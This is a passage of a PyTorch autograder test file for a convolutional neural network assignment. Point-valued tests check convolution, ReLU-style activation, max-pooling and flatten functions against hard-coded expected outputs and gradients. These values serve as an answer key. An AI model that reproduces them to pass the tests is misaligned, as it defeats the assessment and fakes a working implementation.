w = s+np.random.randint(5,20) # width of the image
x1 = th.randn(h,w)
W1 = th.randn(s,s)
b1 = th.randn(1)
z1 = conv2d_a(x1,W1,b1)
assert np.allclose(z1.size(),(h-s+1,w-s+1))
#---------------------------------------------------
def test_conv2d_b():
''' (2 points) conv2d_b'''
# an image of 6 by 8 pixels with 3 color/input channels (shape: 3 channel x 6 height x 8 width)
# l = 3, h = 6, w = 8
x2 = th.tensor([
[[1.,0.,1.,0.,0.,0.,0.,0.],
[1.,0.,1.,0.,0.,0.,0.,0.],
[1.,0.,1.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,1.,0.,1.],
[0.,0.,0.,0.,0.,1.,0.,1.],
[0.,0.,0.,0.,0.,1.,0.,1.]], # the first/red channel of the image
[[0.,1.,0.,0.,0.,0.,0.,0.],
[1.,1.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,1.,1.],
[0.,0.,0.,0.,0.,0.,1.,0.]],# the second/green channel of the image
[[1.,0.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,0.,0.,0.],
[1.,0.,1.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,1.,0.,1.],
[0.,0.,0.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,0.,1.]] # the third/blue channel of the image
])
# one filter of shape 3 x 3 with 3 channels (shape: 3 channels x 3 height x 3 width )
w2 = th.tensor([
[[1.,0.,1.],
[1.,0.,1.],
[1.,0.,1.]], # the first channel of the filter, trying to match a red-colored pattern '| |'
[[0.,1.,0.],
[1.,1.,1.],
[0.,1.,0.]], # the second channel of the filter, trying to match a green-colored pattern '+'
[[1.,0.,1.],
[0.,1.,0.],
[1.,0.,1.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
], requires_grad= True)
b2 = th.tensor(-15., requires_grad = True)
z2 = conv2d_b(x2,w2,b2)
assert type(z2) == Tensor
assert np.allclose(z2.size(),(4,6))
z2_true = [[ 1., -13., -9., -15., -15., -15.],
[ -9., -11., -13., -13., -15., -10.],
[-10., -15., -13., -13., -11., -9.],
[-15., -15., -15., -9., -13., 1.]]
assert np.allclose(z2.data,z2_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z2.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_dw2_true = [[[7., 4., 5.],
[6., 4., 6.],
[5., 4., 7.]],
[[5., 5., 2.],
[5., 6., 5.],
[2., 5., 5.]],
[[6., 4., 4.],
[4., 4., 4.],
[4., 4., 6.]]]
assert np.allclose(w2.grad, dL_dw2_true, atol= 0.1)
assert np.allclose(b2.grad, 24, atol= 0.1)
# test the function with random input sizes
s = np.random.randint(3,5) # size of the filter
    h = s+np.random.randint(5,20) # height of the image
w = s+np.random.randint(5,20) # width of the image
l = np.random.randint(2,10) # number of channels
x2 = th.randn(l,h,w)
W2 = th.randn(l,s,s)
b2= th.randn(1)
z2= conv2d_b(x2,W2,b2)
assert np.allclose(z2.size(),(h-s+1,w-s+1))
#---------------------------------------------------
def test_conv2d_c():
''' (2 points) conv2d_c'''
# an image of 6 by 8 pixels with 3 color/input channels (shape: 3 channel x 6 height x 8 width )
# l = 3, h = 6, w = 8
x3 = th.tensor([
[[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,1.,0.,1.]], # the first/red channel of the image
[[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.]],# the second/green channel of the image
[[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.]] # the third/blue channel of the image
])
    # 2 filters of shape 3 x 3 with 3 channels (shape: 2 filters x 3 channels x 3 height x 3 width)
w3 = th.tensor([
#---------- the first filter with 3 input channels ------
[
[[1.,0.,1.],
[1.,0.,1.],
[1.,0.,1.]], # the first channel of the filter, trying to match a red-colored pattern '| |'
[[0.,1.,0.],
[1.,1.,1.],
[0.,1.,0.]], # the second channel of the filter, trying to match a green-colored pattern '+'
[[1.,0.,1.],
[0.,1.,0.],
[1.,0.,1.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
],
#---------- the second filter with 3 input channels ------
[
[[0.,1.,0.],
[1.,0.,1.],
[0.,1.,0.]], # the first channel of the filter, trying to match a red-colored pattern 'O'
[[1.,1.,1.],
[0.,0.,0.],
[1.,1.,1.]], # the second channel of the filter, trying to match a green-colored pattern '='
[[1.,0.,1.],
[0.,1.,0.],
[0.,1.,0.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
]
#---------------------------------------------------------
], requires_grad=True)
b3 = th.tensor([-15., # the bias for the first filter
-13.], # the bias for the second filter
requires_grad=True)
z3 = conv2d_c(x3,w3,b3)
assert type(z3) == Tensor
assert np.allclose(z3.size(),(2,4,6))
z3_true = [[[ 1., -13., -9., -13., -10., -8.], # outputs of the first filter
[ -6., -9., -12., -11., -11., -4.],
[ -5., -10., -11., -13., -8., -8.],
[ -8., -10., -13., -9., -13., 1.]],
[[ -6., -8., -11., -9., -9., 1.], # outputs of the second filter
[ -4., -5., -10., -13., -7., -11.],
[ -9., -8., -12., -10., -6., -3.],
[ 1., -9., -9., -11., -8., -6.]]]
assert np.allclose(z3.data,z3_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z3.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_dw3_true = [[[[ 9., 8., 9.],
[10., 8., 10.],
[ 9., 8., 9.]],
[[10., 11., 9.],
[ 9., 10., 9.],
[ 9., 11., 10.]],
[[ 9., 8., 9.],
[ 7., 8., 7.],
[ 8., 8., 8.]]],
[[[ 9., 8., 9.],
[10., 8., 10.],
[ 9., 8., 9.]],
[[10., 11., 9.],
[ 9., 10., 9.],
[ 9., 11., 10.]],
[[ 9., 8., 9.],
[ 7., 8., 7.],
[ 8., 8., 8.]]]]
assert np.allclose(w3.grad, dL_dw3_true, atol= 0.1)
assert np.allclose(b3.grad, [24,24], atol= 0.1)
# test the function with random input sizes
s = np.random.randint(2,5) # size of the filter
    h = s+np.random.randint(5,20) # height of the image
w = s+np.random.randint(5,20) # width of the image
l = np.random.randint(2,10) # number of channels
n_filters = np.random.randint(2,10) # number of filters
x3 = th.randn(l,h,w)
W3 = th.randn(n_filters, l,s,s)
b3 = th.randn(n_filters)
z3 = conv2d_c(x3,W3,b3)
assert np.allclose(z3.size(),(n_filters, h-s+1,w-s+1))
#---------------------------------------------------
def test_compute_z1():
''' (2 points) compute_z1'''
# 2 images of 6 by 8 pixels with 3 color/input channels (shape: 3 channel x 6 height x 8 width )
# n = 2, c = 3, h = 6, w = 8
x = th.tensor([
#---------- the first image in the mini-batch ------
[[[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.]], # the first/red channel of the image
[[0.,1.,1.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,1.,1.,1.,0.],
[0.,1.,1.,1.,0.,1.,0.,0.],
[0.,0.,1.,0.,1.,1.,1.,0.],
[0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,1.,0.,1.,1.,1.,0.]],# the second/green channel of the image
[[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,0.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.]]], # the third/blue channel of the image
#---------- the second image in the mini-batch ------
[[[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,1.,0.,1.]], # the first/red channel of the image
[[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.]],# the second/green channel of the image
[[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.]]] # the third/blue channel of the image
])
    # 2 filters of shape 3 x 3 with 3 channels (shape: 2 filters x 3 channels x 3 height x 3 width)
W = th.tensor( [
#---------- the first filter with 3 input channels ------
[
[[1.,0.,1.],
[1.,0.,1.],
[1.,0.,1.]], # the first channel of the filter, trying to match a red-colored pattern '| |'
[[0.,1.,0.],
[1.,1.,1.],
[0.,1.,0.]], # the second channel of the filter, trying to match a green-colored pattern '+'
[[1.,0.,1.],
[0.,1.,0.],
[1.,0.,1.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
],
#---------- the second filter with 3 input channels ------
[
[[0.,1.,0.],
[1.,0.,1.],
[0.,1.,0.]], # the first channel of the filter, trying to match a red-colored pattern 'O'
[[1.,1.,1.],
[0.,0.,0.],
[1.,1.,1.]], # the second channel of the filter, trying to match a green-colored pattern '='
[[1.,0.,1.],
[0.,1.,0.],
[0.,1.,0.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
]
#---------------------------------------------------------
], requires_grad=True)
b = th.tensor([-15., # the bias for the first filter
-13.], # the bias for the second filter
requires_grad=True)
z = compute_z1(x,W,b)
assert type(z) == Tensor
assert np.allclose(z.size(),(2,2,4,6))
#---------- the output on the first image in the mini-batch ------
z_true = [[[[-10., -8., -4., -11., 1., -13.],
[-11., -4., -8., -5., -6., -9.],
[ -8., -8., -4., -8., -5., -10.],
[-13., 1., -11., -4., -8., -10.]], # outputs of the first filter
[[ -9., 1., -7., -4., -6., -8.],
[ -7., -11., -4., -5., -4., -5.],
[ -6., -3., -5., -5., -9., -8.],
[ -8., -6., -4., -7., 1., -9.]]], # outputs of the second filter
#---------- the output on the second image in the mini-batch ------
[[[ 1., -13., -9., -13., -10., -8.],
[ -6., -9., -12., -11., -11., -4.],
[ -5., -10., -11., -13., -8., -8.],
[ -8., -10., -13., -9., -13., 1.]], # outputs of the first filter
[[ -6., -8., -11., -9., -9., 1.],
[ -4., -5., -10., -13., -7., -11.],
[ -9., -8., -12., -10., -6., -3.],
[ 1., -9., -9., -11., -8., -6.]]]] # outputs of the second filter
assert np.allclose(z.data,z_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_dW_true = [[[[19., 21., 20.],
[21., 22., 21.],
[20., 21., 19.]],
[[23., 26., 22.],
[21., 24., 21.],
[22., 26., 23.]],
[[19., 21., 20.],
[16., 19., 17.],
[18., 20., 18.]]],
[[[19., 21., 20.],
[21., 22., 21.],
[20., 21., 19.]],
[[23., 26., 22.],
[21., 24., 21.],
[22., 26., 23.]],
[[19., 21., 20.],
[16., 19., 17.],
[18., 20., 18.]]]]
assert np.allclose(W.grad, dL_dW_true, atol= 0.1)
assert np.allclose(b.grad, [48,48], atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
s = np.random.randint(2,5) # size of the filter
    h = s+np.random.randint(5,20) # height of the image
w = s+np.random.randint(5,20) # width of the image
l = np.random.randint(2,10) # number of channels
n_filters = np.random.randint(2,10) # number of filters
x = th.randn(n,l,h,w)
W = th.randn(n_filters, l,s,s)
b = th.randn(n_filters)
z = compute_z1(x,W,b)
assert np.allclose(z.size(),(n,n_filters, h-s+1,w-s+1))
#---------------------------------------------------
def test_compute_a1():
''' (2 points) compute_a1'''
# n=2, 2 filters, h = 4, w = 6
#---------- the linear logits on the first image in the mini-batch ------
z =th.tensor([[[[-10., -8., -4., -11., 1., -13.],
[-11., -4., -8., -5., -6., -9.],
[ -8., -8., -4., -8., -5., -10.],
[-13., 1., -11., -4., -8., -10.]], # outputs of the first filter
[[ -9., 1., -7., -4., -6., -8.],
[ -7., -11., -4., -5., -4., -5.],
[ -6., -3., -5., -5., -9., -8.],
[ -8., -6., -4., -7., 1., -9.]]], # outputs of the second filter
#---------- the linear logits on the second image in the mini-batch ------
[[[ 1., -13., -9., -13., -10., -8.],
[ -6., -9., -12., -11., -11., -4.],
[ -5., -10., -11., -13., -8., -8.],
[ -8., -10., -13., -9., -13., 1.]], # outputs of the first filter
[[ -6., -8., -11., -9., -9., 1.],
[ -4., -5., -10., -13., -7., -11.],
[ -9., -8., -12., -10., -6., -3.],
[ 1., -9., -9., -11., -8., -6.]]]], # outputs of the second filter
requires_grad=True)
a = compute_a1(z)
# check value
assert type(a) == Tensor
assert np.allclose(a.size(),(2,2,4,6))
#---------- the activations on the first image in the mini-batch ------
a_true = [[[[0., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
#---------- the activations on the second image in the mini-batch ------
[[[1., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0.]]]]
assert np.allclose(a.data, a_true)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in a)
L = a.sum()
# back propagation
L.backward()
# check the gradients dL_dz, which happens to equal to a_true in this test case.
assert np.allclose(z.grad, a_true, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
    h = np.random.randint(5,20) # height of the image
w = np.random.randint(5,20) # width of the image
n_filters = np.random.randint(2,10) # number of filters
z = th.randn(n,n_filters,h,w)
a = compute_a1(z)
assert np.allclose(a.size(),(n,n_filters, h,w))
#---------------------------------------------------
def test_compute_p1():
''' (2 points) compute_p1'''
#---------- the activations on the first image in the mini-batch ------
a = th.tensor([[[[0., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
#---------- the activations on the second image in the mini-batch ------
[[[1., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0.]]]],
requires_grad=True)
p = compute_p1(a)
# check value
assert type(p) == Tensor
assert np.allclose(p.size(),(2,2,2,3))
#---------- the pooled features on the first image in the mini-batch ------
p_true = [[[[0., 0., 1.],
[1., 0., 0.]],
[[1., 0., 0.],
[0., 0., 1.]]],
#---------- the pooled features on the second image in the mini-batch ------
[[[1., 0., 0.],
[0., 0., 1.]],
[[0., 0., 1.],
[1., 0., 0.]]]]
assert np.allclose(p.data, p_true)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in p)
L = p.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_da_true = [[[[1., 0., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 1., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
[[[1., 0., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[1., 0., 1., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 1., 0.],
[1., 0., 0., 0., 0., 0.]]]]
assert np.allclose(a.grad, dL_da_true, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
    h = np.random.randint(5,20)*2 # height of the image
w = np.random.randint(5,20)*2 # width of the image
n_filters = np.random.randint(2,10) # number of filters
a = th.randn(n,n_filters,h,w)
p = compute_p1(a)
assert np.allclose(p.size(),(n,n_filters, h/2,w/2))
# check gradient with multiple max values
a = th.tensor([[[[ 0., 1.],
[ 1., 0.]]]],requires_grad=True)
p = compute_p1(a)
t = p.sum()
t.backward()
dL_da_true = [[[[ 0., 1.],
[ 0., 0.]]]]
assert np.allclose(a.grad,dL_da_true,atol=1e-2)
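    # Note: the expected gradient above assumes that, when several entries tie for the
    # maximum in a pooling window, the gradient is routed to exactly one of them (the
    # first maximum in row-major order, here position (0, 1)) rather than being split
    # between the tied values.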
#---------------------------------------------------
def test_compute_z2():
''' (2 points) compute_z2'''
# the pooled feature map of 2 images, the size of the feature map is 6 by 8 pixels with 3 input channels (shape: 3 channel x 6 height x 8 width )
# n= 2, c1 = 3, h = 6, w = 8
p1= th.tensor([
#---------- the feature map of the first image in the mini-batch ------
[[[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.]], # the first channel of the feature map
[[0.,1.,1.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,1.,1.,1.,0.],
[0.,1.,1.,1.,0.,1.,0.,0.],
[0.,0.,1.,0.,1.,1.,1.,0.],
[0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,1.,0.,1.,1.,1.,0.]],# the second channel of the feature map
[[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,1.,0.,1.,0.],
[0.,1.,0.,1.,1.,0.,1.,0.],
[0.,0.,1.,0.,0.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,0.]]], # the third channel of the feature map
#---------- the feature map of the second image in the mini-batch ------
[[[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,1.,0.,1.]], # the first channel of the feature map
[[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,0.,0.],
[0.,1.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.],
[0.,0.,0.,0.,0.,1.,1.,1.],
[1.,1.,1.,0.,0.,0.,1.,0.]],# the second channel of the feature map
[[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,0.,1.,0.],
[1.,0.,1.,0.,0.,1.,0.,1.],
[0.,1.,0.,0.,0.,0.,1.,0.],
[0.,1.,0.,0.,0.,1.,0.,1.]]] # the third/blue channel of the image
])
    # 2 filters of shape 3 x 3 with 3 channels (shape: 2 filters x 3 channels x 3 height x 3 width)
W = th.tensor( [
#---------- the first filter with 3 input channels ------
[
[[1.,0.,1.],
[1.,0.,1.],
[1.,0.,1.]], # the first channel of the filter, trying to match a red-colored pattern '| |'
[[0.,1.,0.],
[1.,1.,1.],
[0.,1.,0.]], # the second channel of the filter, trying to match a green-colored pattern '+'
[[1.,0.,1.],
[0.,1.,0.],
[1.,0.,1.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
],
#---------- the second filter with 3 input channels ------
[
[[0.,1.,0.],
[1.,0.,1.],
[0.,1.,0.]], # the first channel of the filter, trying to match a red-colored pattern 'O'
[[1.,1.,1.],
[0.,0.,0.],
[1.,1.,1.]], # the second channel of the filter, trying to match a green-colored pattern '='
[[1.,0.,1.],
[0.,1.,0.],
[0.,1.,0.]] # the third channel of the filter, trying to match a blue-colored pattern 'X'
]
#---------------------------------------------------------
], requires_grad=True)
b = th.tensor([-15., # the bias for the first filter
-13.], # the bias for the second filter
requires_grad=True)
z = compute_z2(p1,W,b)
assert type(z) == Tensor
assert np.allclose(z.size(),(2,2,4,6))
#---------- the output on the first image in the mini-batch ------
z_true = [[[[-10., -8., -4., -11., 1., -13.],
[-11., -4., -8., -5., -6., -9.],
[ -8., -8., -4., -8., -5., -10.],
[-13., 1., -11., -4., -8., -10.]], # outputs of the first filter
[[ -9., 1., -7., -4., -6., -8.],
[ -7., -11., -4., -5., -4., -5.],
[ -6., -3., -5., -5., -9., -8.],
[ -8., -6., -4., -7., 1., -9.]]], # outputs of the second filter
#---------- the output on the second image in the mini-batch ------
[[[ 1., -13., -9., -13., -10., -8.],
[ -6., -9., -12., -11., -11., -4.],
[ -5., -10., -11., -13., -8., -8.],
[ -8., -10., -13., -9., -13., 1.]], # outputs of the first filter
[[ -6., -8., -11., -9., -9., 1.],
[ -4., -5., -10., -13., -7., -11.],
[ -9., -8., -12., -10., -6., -3.],
[ 1., -9., -9., -11., -8., -6.]]]] # outputs of the second filter
assert np.allclose(z.data,z_true, atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = z.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_dW_true = [[[[19., 21., 20.],
[21., 22., 21.],
[20., 21., 19.]],
[[23., 26., 22.],
[21., 24., 21.],
[22., 26., 23.]],
[[19., 21., 20.],
[16., 19., 17.],
[18., 20., 18.]]],
[[[19., 21., 20.],
[21., 22., 21.],
[20., 21., 19.]],
[[23., 26., 22.],
[21., 24., 21.],
[22., 26., 23.]],
[[19., 21., 20.],
[16., 19., 17.],
[18., 20., 18.]]]]
assert np.allclose(W.grad, dL_dW_true, atol= 0.1)
assert np.allclose(b.grad, [48,48], atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
s = np.random.randint(2,5) # size of the filter
    h = s+np.random.randint(5,20) # height of the image
w = s+np.random.randint(5,20) # width of the image
c1 = np.random.randint(2,10) # number of channels
c2= np.random.randint(2,10) # number of filters
p1 = th.randn(n,c1,h,w) # pooled feature map of the first convolutional layer
W = th.randn(c2,c1,s,s)
b = th.randn(c2)
z = compute_z2(p1,W,b)
assert np.allclose(z.size(),(n,c2, h-s+1,w-s+1))
#---------------------------------------------------
def test_compute_a2():
''' (2 points) compute_a2'''
# n=2, 2 filters, h = 4, w = 6
#---------- the linear logits on the first image in the mini-batch ------
z =th.tensor([[[[-10., -8., -4., -11., 1., -13.],
[-11., -4., -8., -5., -6., -9.],
[ -8., -8., -4., -8., -5., -10.],
[-13., 1., -11., -4., -8., -10.]], # outputs of the first filter
[[ -9., 1., -7., -4., -6., -8.],
[ -7., -11., -4., -5., -4., -5.],
[ -6., -3., -5., -5., -9., -8.],
[ -8., -6., -4., -7., 1., -9.]]], # outputs of the second filter
#---------- the linear logits on the second image in the mini-batch ------
[[[ 1., -13., -9., -13., -10., -8.],
[ -6., -9., -12., -11., -11., -4.],
[ -5., -10., -11., -13., -8., -8.],
[ -8., -10., -13., -9., -13., 1.]], # outputs of the first filter
[[ -6., -8., -11., -9., -9., 1.],
[ -4., -5., -10., -13., -7., -11.],
[ -9., -8., -12., -10., -6., -3.],
[ 1., -9., -9., -11., -8., -6.]]]], # outputs of the second filter
requires_grad=True)
a = compute_a2(z)
# check value
assert type(a) == Tensor
assert np.allclose(a.size(),(2,2,4,6))
#---------- the activations on the first image in the mini-batch ------
a_true = [[[[0., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
#---------- the activations on the second image in the mini-batch ------
[[[1., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0.]]]]
assert np.allclose(a.data, a_true)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in a)
L = a.sum()
# back propagation
L.backward()
# check the gradients dL_dz, which happens to equal to a_true in this test case.
assert np.allclose(z.grad, a_true, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
    h = np.random.randint(5,20) # height of the image
w = np.random.randint(5,20) # width of the image
n_filters = np.random.randint(2,10) # number of filters
z = th.randn(n,n_filters,h,w)
a = compute_a2(z)
assert np.allclose(a.size(),(n,n_filters, h,w))
#---------------------------------------------------
def test_compute_p2():
''' (2 points) compute_p2'''
#---------- the activations on the first image in the mini-batch ------
a = th.tensor([[[[0., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
#---------- the activations on the second image in the mini-batch ------
[[[1., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[0., 0., 0., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 0., 0., 0., 0.]]]],
requires_grad=True)
p = compute_p2(a)
# check value
assert type(p) == Tensor
assert np.allclose(p.size(),(2,2,2,3))
#---------- the pooled features on the first image in the mini-batch ------
p_true = [[[[0., 0., 1.],
[1., 0., 0.]],
[[1., 0., 0.],
[0., 0., 1.]]],
#---------- the pooled features on the second image in the mini-batch ------
[[[1., 0., 0.],
[0., 0., 1.]],
[[0., 0., 1.],
[1., 0., 0.]]]]
assert np.allclose(p.data, p_true)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in p)
L = p.sum()
# back propagation
L.backward()
# check the gradients of w, b
dL_da_true = [[[[1., 0., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 1., 0.],
[0., 1., 0., 0., 0., 0.]],
[[0., 1., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 1., 0.]]],
[[[1., 0., 1., 0., 1., 0.],
[0., 0., 0., 0., 0., 0.],
[1., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0., 1.]],
[[1., 0., 1., 0., 0., 1.],
[0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 1., 0.],
[1., 0., 0., 0., 0., 0.]]]]
assert np.allclose(a.grad, dL_da_true, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
    h = np.random.randint(5,20)*2 # height of the image
w = np.random.randint(5,20)*2 # width of the image
n_filters = np.random.randint(2,10) # number of filters
a = th.randn(n,n_filters,h,w)
p = compute_p2(a)
assert np.allclose(p.size(),(n,n_filters, h/2,w/2))
# check gradient with multiple max values
a = th.tensor([[[[ 0., 1.],
[ 1., 0.]]]],requires_grad=True)
    p = compute_p2(a)
t = p.sum()
t.backward()
dL_da_true = [[[[ 0., 1.],
[ 0., 0.]]]]
assert np.allclose(a.grad,dL_da_true,atol=1e-2)
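    # (Both 1.0 entries tie for the maximum of the 2x2 window, yet the expected gradient is
    #  routed to only one of them -- the first in row-major order here -- which is consistent
    #  with how torch's max_pool2d assigns the gradient when a window has ties.)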
#---------------------------------------------------
def test_flatten():
''' (2 points) flatten'''
#---------- the pooling results on the first image in the mini-batch ------
p = th.tensor([[[[0., 0., 1.],
[1., 0., 0.]],
[[1., 0., 0.],
[0., 0., 1.]]],
#---------- the pooling results on the second image in the mini-batch ------
[[[1., 0., 0.],
[0., 0., 1.]],
[[0., 0., 1.],
[1., 0., 0.]]]],requires_grad=True)
f = flatten(p)
# check value
assert type(f) == Tensor
assert np.allclose(f.size(),(2,12))
f_true = [[0., 0., 1., 1., 0., 0., 1., 0., 0., 0., 0., 1.], # flat feature of the first image in the mini-batch
[1., 0., 0., 0., 0., 1., 0., 0., 1., 1., 0., 0.]] # flat feature of the second image in the mini-batch
